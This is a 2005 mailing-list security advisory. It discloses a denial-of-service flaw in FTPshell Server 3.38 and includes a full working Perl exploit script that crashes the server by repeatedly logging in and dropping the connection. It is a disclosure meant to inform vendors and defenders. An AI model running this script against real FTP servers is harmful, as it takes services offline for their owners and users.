Denial of service vulnerability in FTPshell Server Version 3.38

To: vuln@xxxxxxxxxxx, news@xxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
Subject: Denial of service vulnerability in FTPshell Server Version 3.38
From: Reed Arvin <reedarvin@xxxxxxxxx>
Date: Mon, 25 Jul 2005 19:50:41 -0700
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=iXK46BYC2HI0kKij/YtVZl1alMlCxJS6kB+SRzugP1RWuVWi0wJ3t2a5+Uz+GdLwlEV/8HEBdTbATAO8RPYINfJBCG9TblJwfs5WuHthsUCRBY98zxOV1vDXpSUQWsnOKU7/XPlmqOSq9DeIOzypbystG7mTXYTwqG+h/+ufmZM=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Reply-to: Reed Arvin <reedarvin@xxxxxxxxx>

Summary:
Denial of service vulnerability in FTPshell Server Version 3.38
(http://www.ftpshell.com/)

Details:
Logging into the FTP server successfully and then closing the
connection (without using the QUIT command) 39 times will cause the
ftpshelld.exe process will die.

Vulnerable Versions:
FTPshell Server Version 3.38

Patches/Workarounds:
The vendor was notified of the issue. A patch will be release shorly.
The patch will be made available via the vendor's web site
(http://www.ftpshell.com/).

Exploits:
Run the following PERL script against the server. The corresponding
process will die.

#===== Start FTPShell_FTPDOS.pl =====
#
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
#        FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";

for ($i = 1; $i <= 40; $i++)
{
        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "21",
                                            Proto    => "TCP"))
        {
                print "Login \#$i\n";

                Win32::Sleep(300);

                print $socket "USER $ARGV[1]\r\n";

                Win32::Sleep(100);

                print $socket "PASS $ARGV[2]\r\n";

                Win32::Sleep(100);

                print $socket "PORT 127,0,0,1,18,12\r\n";

                Win32::Sleep(100);

                close($socket);
        }
        else
        {
                print "Cannot connect to $ARGV[0]:21\n";
        }
}
#===== Start FTPShell_FTPDOS.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)

Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)

Prev by Date: [USN-153-1] fetchmail vulnerability
Next by Date: SPIDynamics WebInspect Cross-Application Scripting (XAS)
Previous by thread: [USN-153-1] fetchmail vulnerability
Next by thread: SPIDynamics WebInspect Cross-Application Scripting (XAS)
Index(es):
- Date
- Thread